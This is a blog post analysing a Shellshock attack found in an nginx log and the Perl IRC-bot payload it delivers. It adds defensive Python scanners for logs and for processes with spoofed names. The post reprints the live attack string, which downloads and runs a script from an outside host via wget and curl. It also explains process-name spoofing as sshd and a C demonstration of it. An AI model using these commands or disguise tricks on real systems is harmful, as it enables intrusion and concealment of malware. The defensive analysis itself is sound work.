While looking into my nginx log files, I stumbled across an obvious automated hacking attempt and decided to investigate it.

About this log entry

Here is the weird entry I've found in my /var/log/nginx/access.log:

188.26.104.151 - - [03/Jan/2017:19:08:00 +0100] "GET / HTTP/1.0" 200 4126 "-" "() { :;}; /bin/bash -c \x22wget http://palmiraplus.kz/.mail -O /tmp/.mail;curl -o /tmp/.mail http://palmiraplus.kz/.mail;chmod +x /tmp/.mail;perl /tmp/.mail;rm -rf /tmp/.mail*\x22"

OK, the last field is clearly a shell script. According to the nginx documentation, this field is the User-Agent string that the requester claimed to use. Let's see what it does:

The User Agent

If you are familiar with the Shellshock vulnerability, you probably recognized this () { :;}; pattern: an attempt to exploit a well-known bash bug, which was fixed years ago. I believe that the main targets of this attack are probably old IoT devices, which are not often upgraded.

Anyway, what does it do?

It basically tries to spawn a bash process (/bin/bash -c [...]) and execute this:

wget http://palmiraplus.kz/.mail -O /tmp/.mail
curl -o /tmp/.mail http://palmiraplus.kz/.mail
chmod +x /tmp/.mail
perl /tmp/.mail
rm -rf /tmp/.mail*
  • The first two lines are two different ways to download a payload from a remote HTTP server; I'll talk about the content of the file later. Most Linux devices have either curl or wget installed, so using both is a good way to reach a wider set of machines. Another interesting detail is that both methods download the payload into /tmp/: that folder is writable by every Linux user by default, so the download succeeds whatever account the web server runs as.

  • The third line turns the payload into an executable file.

  • The fourth line executes the file using the Perl interpreter (BTW, the payload does not need to be executable if we feed it to the Perl interpreter like that). Using Perl is a fairly good choice, as it's installed by default on most Linux distributions (at least on the ones I know about).

  • Finally, the last line removes the downloaded payload, to cover the attacker's tracks.
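The log line above is only visible because nginx writes the raw User-Agent into access.log, with any double quote escaped as \x22. Searching for it by hand does not scale, so here is an added example (not from the original post) of the detection logic a defender would run over the access log: it parses nginx's combined format, undoes the \xHH escaping, flags any client-controlled field carrying the Shellshock function-definition pattern, and extracts the hosts the injected commands try to download from, which is what you would feed into blocklists or a threat-intel lookup. The second sample line is a constructed benign request for comparison; the first is the entry quoted in this post.

```python
import re
from urllib.parse import urlparse

# nginx "combined" format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent
#   "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<addr>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# nginx escapes a double quote inside a logged field as \x22 (other unsafe
# bytes the same way), which is why the quoted fields above never contain a
# literal quote and why the payload's quotes show up as \x22 in the log.
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{2})')

# Shellshock trigger: an exported-function definition "() { ... }" followed
# by ";" and trailing commands. Scanners vary the whitespace and the body.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{[^}]*\}\s*;')
URL_RE = re.compile(r'(?:https?|ftp)://[^\s"\';|&<>]+')

def nginx_unescape(field):
    """Turn nginx's \\xHH escapes back into the characters the client sent."""
    return ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), field)

def parse_line(line):
    """Split one combined-format line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\r\n'))
    if not m:
        return None
    rec = m.groupdict()
    for key in ('request', 'referer', 'ua'):
        rec[key] = nginx_unescape(rec[key])
    return rec

def analyse(line):
    """Flag Shellshock attempts in the client-controlled fields and pull out
    the hosts the injected commands try to download from."""
    rec = parse_line(line)
    if rec is None:
        return None
    hit = {'addr': rec['addr'], 'time': rec['time'], 'shellshock': False,
           'fields': [], 'payload_hosts': set()}
    for field in ('ua', 'referer', 'request'):
        if SHELLSHOCK_RE.search(rec[field]):
            hit['shellshock'] = True
            hit['fields'].append(field)
            for url in URL_RE.findall(rec[field]):
                host = urlparse(url).hostname
                if host:
                    hit['payload_hosts'].add(host)
    hit['payload_hosts'] = sorted(hit['payload_hosts'])
    return hit

def scan(lines):
    """Return the analysis of every line that carries a Shellshock attempt."""
    return [h for h in map(analyse, lines) if h and h['shellshock']]

# Two sample lines: the first is the entry quoted in this post, the second
# is a constructed benign request for comparison.
SAMPLE_LINES = [
    r'188.26.104.151 - - [03/Jan/2017:19:08:00 +0100] "GET / HTTP/1.0" 200 4126 "-" '
    r'"() { :;}; /bin/bash -c \x22wget http://palmiraplus.kz/.mail -O /tmp/.mail;'
    r'curl -o /tmp/.mail http://palmiraplus.kz/.mail;chmod +x /tmp/.mail;'
    r'perl /tmp/.mail;rm -rf /tmp/.mail*\x22"',
    '192.0.2.10 - - [03/Jan/2017:19:09:12 +0100] "GET /index.html HTTP/1.1" 200 4126 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/50.0"',
]

if __name__ == '__main__':
    for hit in scan(SAMPLE_LINES):
        print(f"{hit['time']} {hit['addr']} shellshock via {','.join(hit['fields'])}"
              f" -> payload hosts: {', '.join(hit['payload_hosts']) or 'none'}")
```

Checking the Referer and request line as well as the User-Agent matters because any header that the web server hands to a CGI child as an environment variable was a valid Shellshock vector, so scanners did not always use the User-Agent. Feed the script your real access.log with scan(open(path)) and the output is a ready-made list of scanning sources and payload hosts.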

So I downloaded the perl script from http://palmiraplus.kz/.mail and I will try to explain what it does.

The Perl Script

I've put the script here if you want to see it.

I don't really know Perl, but from my understanding the file contains a tiny IRC client which connects to a remote server and waits for specific commands.

It's basically an IRC botnet.

The implementation of the IRC client is pretty boring in itself, but the script uses some other tricks that I find interesting. For instance, it changes its own process name; I've always wondered how one could do that, and the answer is really, really simple!

my @fakeps = ("/usr/sbin/sshd");
    [...]
my $xproc = $fakeps[rand scalar @fakeps];
    [...]
$0="$xproc"."\0";

Which can be reduced into:

$0="/usr/sbin/sshd\0";

It just rewrites $0, the variable that holds the process name. I had no idea that those arguments could be writable!

I've tried this in C, to see if it was Perl-specific, and BAAM, it works! :)

#include <string.h>
#include <unistd.h>

int main(int argc, char **argv) {
    if (argc < 1) return 1;

    // The argv strings sit back to back in memory, and /proc/<pid>/cmdline
    // (what ps, top and htop read) is a view of exactly that region. The
    // writable space therefore runs from argv[0] to the NUL ending the last
    // argument; writing further would trample the environment strings.
    size_t room = (size_t)((argv[argc - 1] + strlen(argv[argc - 1])) - argv[0]);

    // First clear every argument string
    memset(argv[0], '\0', room);

    // Overwrite the process name, truncated to the space we actually own.
    // Run it with a few dummy arguments (./a.out xxxxxxxxxxxxxxxxxxxx) so
    // the whole fake name fits.
    strncpy(argv[0], "Some really fake name", room);

    // Keep the program running, so we can check its name using htop
    for (;;) {
        pause();
    }
    return 0;
}

If you run this code and then look at its name using ps, top or htop, it will be called "Some really fake name"!
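The reason both the Perl one-liner and the C program work is that ps, top and htop read /proc/<pid>/cmdline, which is simply the process's own argv memory. What the process cannot rewrite is /proc/<pid>/exe, the kernel's symlink to the binary that was actually mapped. As an added example (not code from the post or from the bot), here is a small Python check that compares the two: a Perl script claiming to be /usr/sbin/sshd still has exe pointing at the Perl binary, and a binary that was unlinked after it started shows up with a " (deleted)" suffix on the exe link. The sample /proc values are constructed; scan_proc() walks a real Linux /proc when run as a script.

```python
import os

def argv0_of(cmdline):
    """argv[0] as the process itself reports it. /proc/<pid>/cmdline is a
    NUL-separated copy of the argv memory, and that memory belongs to the
    process: Perl's $0 assignment and the C strcpy() above both just write
    into it."""
    if not cmdline:
        return ''
    return cmdline.split(b'\0', 1)[0].decode('utf-8', 'replace')

def check_process(cmdline, exe_target):
    """Compare the self-reported name with the kernel's own record of the
    mapped executable (the readlink() target of /proc/<pid>/exe, which the
    process cannot rewrite). Returns a list of indicator strings; an empty
    list means the two agree."""
    indicators = []
    real = exe_target
    if real.endswith(' (deleted)'):
        # The kernel appends this when the binary was unlinked after exec,
        # i.e. the same "run, then rm" pattern as the rm -rf in the payload.
        real = real[:-len(' (deleted)')]
        indicators.append(f'executable {real!r} was deleted while running')
    argv0 = argv0_of(cmdline)
    if not argv0:
        indicators.append('empty argv (arguments wiped by the process)')
        return indicators
    claimed = os.path.basename(argv0)
    actual = os.path.basename(real)
    if claimed != actual:
        indicators.append(f'argv[0] claims {claimed!r} but exe is {real!r}')
    return indicators

def scan_proc(proc='/proc'):
    """Walk /proc on a Linux host and return {pid: indicators} for every
    process whose story does not add up. Needs root to read other users'
    exe links; unreadable or vanished processes are skipped."""
    findings = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        base = os.path.join(proc, entry)
        try:
            with open(os.path.join(base, 'cmdline'), 'rb') as f:
                cmdline = f.read()
            exe = os.readlink(os.path.join(base, 'exe'))
        except OSError:
            continue  # kernel thread, already exited, or not ours to inspect
        indicators = check_process(cmdline, exe)
        if indicators:
            findings[int(entry)] = indicators
    return findings

# Constructed samples: what the Perl bot would look like from /proc, versus
# a genuine sshd and a program whose binary was removed after it started.
SAMPLES = {
    'perl bot posing as sshd': (b'/usr/sbin/sshd\0', '/usr/bin/perl'),
    'real sshd': (b'/usr/sbin/sshd\0-D\0', '/usr/sbin/sshd'),
    'binary removed after start': (b'/tmp/.mail\0', '/tmp/.mail (deleted)'),
}

if __name__ == '__main__':
    for label, (cmdline, exe) in SAMPLES.items():
        print(f'{label}: {check_process(cmdline, exe) or "consistent"}')
    if os.path.isdir('/proc'):
        for pid, inds in sorted(scan_proc().items()):
            print(pid, '; '.join(inds))
```

Expect some noise on a real host: a few legitimate daemons relabel their worker processes through argv for exactly the same reason (readability in ps), and interpreter versions can make argv[0] and the exe basename differ, so in practice the mismatch list needs a short allow-list before it becomes an alert. The exe-versus-argv disagreement itself, though, is the signal this bot cannot hide from.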

Another cool trick of this script is the way it puts itself into the background:

my $pid=fork;
exit if $pid;

Those two lines simply duplicate the process with fork, then make the original (the parent) exit, which lets the calling program move on while the child keeps running. Without this little trick the vulnerable web server might freeze forever, stuck in the infinite loop of the Perl script.

The IRC botnet

When I first looked into this script (a year ago), I tried to connect to the IRC server as if I were a regular victim. Sadly, I was automatically kicked out of the server; there was obviously some kind of authentication.

It appears that the script always uses the same nickname "V", and only accepts messages (i.e. commands) from a user "G", and only if this user disguises himself as localhost.

I've set up a tiny IRC server and tuned the Perl script to connect to it, so I could try it. Basically the script allows any "logged-in" user to execute bash commands on the target, kinda like an IRC-based telnet server.

Now I kinda regret that I did not take the time earlier to study the script; it would have been trivial to connect to the IRC botnet and log every command used. I could have learned a lot more about the attackers and their techniques...

Conclusion

This little investigation was really fun; I will definitely check my logs more often :)

  • Nov. 19 2017, 04:05 pm